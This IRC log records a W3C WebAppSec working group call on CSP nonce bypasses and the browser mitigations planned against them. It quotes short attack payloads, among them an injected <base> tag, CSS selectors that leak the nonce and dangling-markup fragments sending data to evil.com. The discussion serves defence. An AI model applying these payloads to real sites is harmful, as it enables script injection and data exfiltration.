16:48:49 <RRSAgent> RRSAgent has joined #webappsec
16:48:49 <RRSAgent> logging to http://www.w3.org/2017/01/25-webappsec-irc
16:48:51 <Zakim> Zakim has joined #webappsec
16:49:54 <bhill2> bhill2 has joined #webappsec
16:49:56 <wseltzer> Agenda: https://lists.w3.org/Archives/Public/public-webappsec/2017Jan/0020.html
16:50:55 <bhill2> bhill2 has joined #webappsec
16:51:53 <bhill2> bhill2 has joined #webappsec
16:52:52 <bhill2> bhill2 has joined #webappsec
16:53:52 <bhill2> bhill2 has joined #webappsec
16:54:49 <bhill2> bhill2 has joined #webappsec
16:55:51 <bhill2> bhill2 has joined #webappsec
16:56:47 <ArturJanc> ArturJanc has joined #webappsec
16:56:48 <bhill2> bhill2 has joined #webappsec
16:57:37 <francois> francois has joined #webappsec
16:57:49 <bhill2> bhill2 has joined #webappsec
16:57:57 <wseltzer> present+ wseltzer
16:58:54 <bhill2> bhill2 has joined #webappsec
16:59:51 <bhill2> bhill2 has joined #webappsec
16:59:58 <ArturJanc> present+ ArturJanc
17:00:14 <freddyb> present+ freddyb
17:00:16 <lwe> lwe has joined #webappsec
17:00:33 <mkwst> present+ mkwst
17:01:26 <gmaone> present+ gmaone
17:01:47 <bhill2> bhill2 has joined #webappsec
17:01:54 <ckerschb__> ckerschb__ has joined #webappsec
17:02:11 <bhill2> :(
17:02:19 <bhill2> oh, crap.  I am on an airplane.
17:02:34 <mkwst> ...
17:02:47 <bhill2> Dan?
17:03:03 <dveditz> almost there
17:03:09 <dveditz> (dialing)
17:04:48 <dveditz> present+ dveditz
17:04:54 <mikispag> mikispag has joined #webappsec
17:04:56 <bhill2> bhill2 has joined #webappsec
17:04:56 <wseltzer> zakim, who is here?
17:04:56 <Zakim> Present: wseltzer, ArturJanc, freddyb, mkwst, gmaone, dveditz
17:04:57 <Zakim> On IRC I see bhill2, mikispag, ckerschb__, lwe, francois, ArturJanc, Zakim, RRSAgent, gmaone, yoav, Agent_Smith_BR, Jb, deian, Mek, schuki, sangwhan, mounir, freddyb, jcj_moz,
17:04:58 <Zakim> ... terri, tobie, timeless, dveditz, Josh_Soref, ojan, slightlyoff, mkwst, rrware, Domenic, jww, jkt, dbaron, hadleybeeman, jochen___, adrianba, jyasskin, gszathmari, MattN,
17:04:58 <Zakim> ... wseltzer, trackbot
17:05:22 <wseltzer> Agenda: https://lists.w3.org/Archives/Public/public-webappsec/2017Jan/0020.html
17:05:44 <ckerschb__> present+ ckerschb__
17:05:44 <wseltzer> Chair: dveditz
17:06:00 <wseltzer> zakim, who is on the phone?
17:06:00 <Zakim> Present: wseltzer, ArturJanc, freddyb, mkwst, gmaone, dveditz, ckerschb__
17:06:06 <wseltzer> regrets+ bhill2
17:06:24 <dveditz> TOPIC: Agenda Bashing
17:06:26 <terri> present+ terri
17:06:38 <mkwst> dveditz: Anything to add to the agenda?
17:07:07 <mkwst> everyone: <crickets>
17:07:09 <dveditz> TOPIC: Recharter update
17:07:32 <mkwst> wseltzer: The current charter extended without change through March,
17:07:35 <wseltzer> https://rawgit.com/w3c/webappsec/master/admin/webappsec-charter-2017.html
17:07:49 <mkwst> ... proposed draft charter at https://rawgit.com/w3c/webappsec/master/admin/webappsec-charter-2017.html.
17:08:04 <mkwst> ... Reviewing that internally, then sending it out to the AC for a wider review.
17:08:14 <mkwst> ... During that period, please ask your AC rep to indicate support.
17:08:23 <freddyb> ah, now.
17:08:38 <mkwst> ... If you or your AC rep won't support the charter, please let us know before we propose it. :)
17:08:48 <wseltzer> q+
17:08:51 <mkwst> dveditz: We've chatted about this multiple times, I hope we'll be good to go.
17:09:06 <mkwst> ... If there's something horrible you came up with over the holiday, do let us know.
17:09:18 <wseltzer> q-
17:09:28 <mkwst> wseltzer: Sometimes WG and AC members aren't on the same page; if you have a chance to check with your rep, that'd be helpful.
17:09:52 <mkwst> ... I'll let you know when it's out for review.
17:09:53 <dveditz> TOPIC: nonce  / script-dynamic bypasses and mitigations
17:10:20 <dveditz> scribenick mkwst
17:10:25 <wseltzer> i/Anything to add/scribenick: mkwst
17:11:22 <mkwst> ArturJanc: Recent reports of bypasses for nonce-based policies. I'll go through a few details, then mkwst might want to fill in some blanks with Chrome-specific details.
17:11:22 <bhill2> bhill2 has joined #webappsec
17:11:44 <mkwst> ArturJanc: Context: A few weeks ago, folks on Twitter chatted a bit about bypassing nonce-based CSP.
17:11:58 <mkwst> ... Google uses nonces.
17:12:10 <mkwst> dveditz: It's the heart of `strict-dynamic`, right?
17:12:32 <mkwst> ArturJanc: Right. But the attacks we're looking at right now are attacks on nonces, not on `strict-dynamic`.
17:13:03 <mkwst> ... Two broad categories of attacks
17:13:11 <mkwst> ... 1. Injection of `<base>` tags.
17:13:49 <mkwst> ... Alters the meaning of relative URLs, which means that nonced `<script>` elements can point to `evil.com` if a malicious `<base>` element is injected.
17:14:42 <mkwst> ... e.g. `<script nonce=abc src=/good.js>` turns into `<script nonce=abc src=https://evil.com/good.js>` in the presence of `<base href="https://evil.com/">`.
17:14:51 <bhill2> bhill2 has joined #webappsec
17:15:15 <mkwst> ... Problem for nonce-based policies, not a problem for hashes or policies that list acceptable hosts.
17:15:37 <mkwst> ... Should probably note this in the spec. Many folks that use nonces don't set a `base-uri` directive. They probably should.
17:16:40 <mkwst> ... 2. SVG attribute modification via <set> and/or <animate>.
17:16:49 <mkwst> ... (Chrome-specific issue)
17:17:00 <bhill2> bhill2 has joined #webappsec
17:17:01 <mkwst> ... Attacker injects `<svg>...<set ...>` into the page.
17:17:22 <mkwst> ... It turns any following `<script>` elements into SVGScriptElement rather than HTMLScriptElement.
17:17:39 <mkwst> ... The `<set>` element alters the script's `href` attribute.
17:17:48 <mkwst> ... Which leads to script execution.
17:18:04 <dveditz> interesting... thought svg animation could only affect CSS properties
17:18:06 <mkwst> ... Mike fixed that in Chrome.
17:19:12 <bhill2> bhill2 has joined #webappsec
17:19:12 <dveditz> mkwst: "freddy from Opera fixed this in blink"
17:19:13 <mkwst> mkwst: Right. This is a bug in Chrome, not a bug in SVG. We didn't follow the spec, Frederik from Opera fixed our implementation.
17:19:37 <mkwst> ArturJanc: SVG seems fixed, but it points to an interesting category of attack that we should probably look into.
17:20:04 <mkwst> ... 3. Steal the nonce, use it later.
17:20:09 <mkwst> ... 3a. Steal the nonce.
17:20:18 <mkwst> ... We operate with a model in which there is an injection:
17:20:40 <mkwst> ... So, an attacker can inject CSS with attribute selectors to match the nonce value in better-than-brute-force time.
17:20:47 <mkwst> ... [nonce^=a], etc.
17:21:23 <mkwst> ... Or the attacker can inject dangling markup (`<textarea>`, `<img src='https://evil.com?whatever=`, etc) that causes exfiltration.
17:21:29 <dveditz> better-than-brute-force? I'll have to re-read sidarkcat's writeup
17:21:46 <mkwst> ... 3b. Once the nonce is exfiltrated, it might be possible to reuse it, based on the application's structure.
17:22:15 <mkwst> ... If the application listens for a message, and dumps it to `innerHTML`, the attacker can inject properly nonced code.
17:22:53 <mkwst> ... `<iframe srcdoc="<script nonce='{$nonce}'>evil!</script>">`
17:23:09 <bhill2> bhill2 has joined #webappsec
17:23:15 <mkwst> ... Similarly, URL fragments are sometimes reflected (routing, etc).
17:23:28 <mkwst> ... A few other similar mechanisms.
17:23:53 <mkwst> ... You can run a similar kind of attack based on the cachability of a document.
17:24:25 <mkwst> ... Load the page, use the first payload to exfiltrate nonces, then `.back()`, then `.forward()`, etc.
17:24:38 <mkwst> ... If the injection doesn't depend on the URL, this is exploitable.
17:25:29 <mkwst> ... 1. Perhaps we can prevent the nonce from being stolen?
17:25:44 <mkwst> ... 2. Perhaps we can prevent the nonce from being reused, if/when stolen.
17:26:04 <dveditz> scribenick: dveditz
17:26:21 <dveditz> mkwst: any questions based on ArturJanc's explanations?
17:27:01 <mkwst> dveditz: Artur, you mentioned two ways to steal the nonce. CSS and dangling markup.
17:27:04 <mkwst> ... Is there another I missed?
17:27:21 <mkwst> ArturJanc: Dangling markup is a pretty big category.
17:27:26 <bhill2> bhill2 has joined #webappsec
17:27:52 <mkwst> ... `<style>div { background: url('https://evil.com/?whatever=`
17:28:05 <mkwst> ... And other variants.
17:28:36 <dveditz> mkwst: we're doing acouple of experiments to see if they change behavior and fix this
17:28:51 <dveditz> ... first is to see if we can hide the nonce from the DOM that makes this harder to do
17:29:27 <dveditz> ... f.e. move the nonce from an HTML attribute to an internal attribute of the script.
17:29:56 <bhill2> bhill2 has joined #webappsec
17:30:13 <dveditz> ... the author writes the nonce attribute, but the parser moves the attribute so it's not available to the document.
17:30:41 <dveditz> ... can still get the nonce through the nonce IDL, foo.nonce, so scripts can pass them along to new scripts
17:30:55 <dveditz> ... we belive that if you have script execution you can do anything anyway
17:31:44 <dveditz> ... Also looking to mitigate dangling markup. Will be difficult to completely address this, but some forms may be easy to squash
17:33:00 <dveditz> ... added some experiments to chrome, 1) examine contents of URL vs base URL. If it contains a newline AND an opening brace then we'll treat that as a parse error rather than %-escaping.
17:33:18 <dveditz> ... change to URL parser--treat newlines as an error.
17:34:22 <dveditz> ... second experiment is on forms. Two types of elements that eat stuff -- textarea and select. If they're closed by EOF rather than an actual closing tag we'll fire an error rather than submit
17:35:19 <dveditz> ... We think these will prevent a couple of forms of direct exfiltration
17:36:32 <dveditz> ... That was exfiltration. on to reuse
17:37:00 <dveditz> ... generally the reuse implies a DOM api to inject script into page (e.g. <iframe srcdoc artur mentioned earlier)
17:38:04 <dveditz> ... we want a parser-inserted script to work if delivered by a page, but suspicious of ones injected by script (as parser inserted)
17:38:32 <dveditz> ... thinking of adding a new script-src keyword that means "even more strict about parser inserted"
17:39:04 <dveditz> ... Is the parser kicked off by script? (document.write, innerHTML, etc) tag scripts and probably iframes if created that way
17:39:42 <dveditz> ... check that flag when doing execution. If this new keyword is set then these scripts would not execute
17:40:05 <dveditz> ... Prevents nonce re-use, but might be a useful hardening approach in general as well
17:41:16 <dveditz> ... We were able to do this because this concept (parser inserted) already existed in the HTML spec, but it's not flagged for later use. that's new
17:41:46 <dveditz> ... we'll need to define this new concept in HTML and hope it fits as well with other browser's implementations
17:42:37 <dveditz> ... We hope this deflects both the recently discussed attacks and prevents future ones
17:43:03 <dveditz> ... as mentioned, playing with experimental implementations to see how hard this is and whether it works and will bring feedback to the group
17:44:00 <dveditz> dveditz: could we propose certain attributes (nonce, integrity) as unavailable for CSS selector matching?
17:44:26 <dveditz> mkwst: we discussed that but seems super icky. requires reaching into CSS to fix a problem that has nothing to do with CSS
17:44:52 <dveditz> ... XHR/fetch has the concept of "sec-*" headers that are untouchable... could do something like that
17:45:54 <dveditz> ... Artur and I will put docs together and bring them back to the group
17:47:37 <dveditz> ArturJanc: we found 5 or so different types of exfiltration
17:48:16 <dveditz> ... same-origin XSLT was one, but to pull this off you already need the equivalent of script execution. more academic interest
17:48:21 <ArturJanc> https://sirdarckcat.github.io/csp/attlist.xml
17:48:34 <mkwst> dveditz: Few minutes left.
17:48:41 <dveditz> TOPIC: Security review of IndexedDB API
17:48:53 <mkwst> ... Request for review of IDB.
17:49:32 <dveditz> https://lists.w3.org/Archives/Public/public-webappsec/2017Jan/0008.html
17:49:51 <mkwst> ... Implemented in many browsers, hopefully their security teams did review.
17:49:55 <wseltzer> q+
17:49:56 <mkwst> ... We haven't done much formal review.
17:50:20 <mkwst> wseltzer: I'll note that the W3C just recharted the Web Security IG.
17:50:28 <mkwst> ... That's another place that reviews can happen.
17:50:41 <mkwst> ... After recharter, they seem interested in taking on more of this kind of work.
17:50:52 <mkwst> ... Also looking at taking up the security questionnaire.
17:51:18 <mkwst> ... So, I'd invite y'all to join that group for reviews.
17:51:20 <wseltzer> Web Security IG: public-web-security@w3.org
17:51:23 <dveditz> TOPIC: Multiple origins for manifested web apps
17:51:58 <dveditz> https://lists.w3.org/Archives/Public/public-webappsec/2017Jan/0000.html
17:52:21 <mkwst> dveditz: They'd like folks to look at this proposal to allow multiple scopes for a web manifest file.
17:52:28 <mkwst> ... That's the end of the agenda.
17:52:39 <mkwst> ... Any questions? Proposals for next time?
17:52:45 <mkwst> ... When _is_ next time, actually?
17:53:00 <mkwst> ... Third Wednesday of the month.
17:53:01 <freddyb> Feb 15th?
17:53:06 <mkwst> ... February 15th.
17:53:07 <dveditz> Feb 15, 2017 -- 3rd wednesday
17:53:33 <mkwst> ... It's on my calendar, which I got from somewhere. So hopefully it's on the W3C WebAppSec calendar that's on the group's homepage.
17:54:20 <freddyb> calendar is embedded at the very top of https://www.w3.org/2011/webappsec/
17:54:28 <dveditz> thx freddyb
17:54:46 <mkwst> wseltzer: Referrer Policy is moving to CR tomorrow!
17:54:52 <mkwst> ... Also, WebCrypto to REC tomorrow!
17:54:56 <mkwst> ... Huzzah!
17:55:08 <mkwst> ... Also, I'll make sure WebEx works.
17:56:03 <mkwst> everyone: Bye!
17:56:05 <mkwst> <fin>
17:57:03 <jochen___> yay, referrer policy, indeed :)
18:26:35 <bhill2> bhill2 has joined #webappsec
18:31:25 <bhill2> bhill2 has joined #webappsec
20:23:39 <Zakim> Zakim has left #webappsec
20:25:23 <bhill2_> bhill2_ has joined #webappsec
21:33:52 <bhill2> bhill2 has joined #webappsec
22:18:41 <wseltzer> rrsagent, make minutes
22:18:41 <RRSAgent> I have made the request to generate http://www.w3.org/2017/01/25-webappsec-minutes.html wseltzer
22:18:52 <wseltzer> rrsagent, make logs public
22:18:53 <wseltzer> rrsagent, make minutes
22:18:53 <RRSAgent> I have made the request to generate http://www.w3.org/2017/01/25-webappsec-minutes.html wseltzer
22:20:03 <wseltzer> i/Few minutes left./scribenick: mkwst
22:20:05 <wseltzer> rrsagent, make minutes
22:20:05 <RRSAgent> I have made the request to generate http://www.w3.org/2017/01/25-webappsec-minutes.html wseltzer
22:20:52 <wseltzer> s/oh, crap. I am on an airplane.//
22:20:57 <wseltzer> s/Dan?//
22:21:05 <wseltzer> s/almost there//
22:21:15 <wseltzer> s/:(//
22:21:19 <wseltzer> rrsagent, make minutes
22:21:19 <RRSAgent> I have made the request to generate http://www.w3.org/2017/01/25-webappsec-minutes.html wseltzer
22:21:53 <wseltzer> s/oh, crap.//
22:21:54 <wseltzer> rrsagent, make minutes
22:21:54 <RRSAgent> I have made the request to generate http://www.w3.org/2017/01/25-webappsec-minutes.html wseltzer
23:36:41 <bhill2_> bhill2_ has joined #webappsec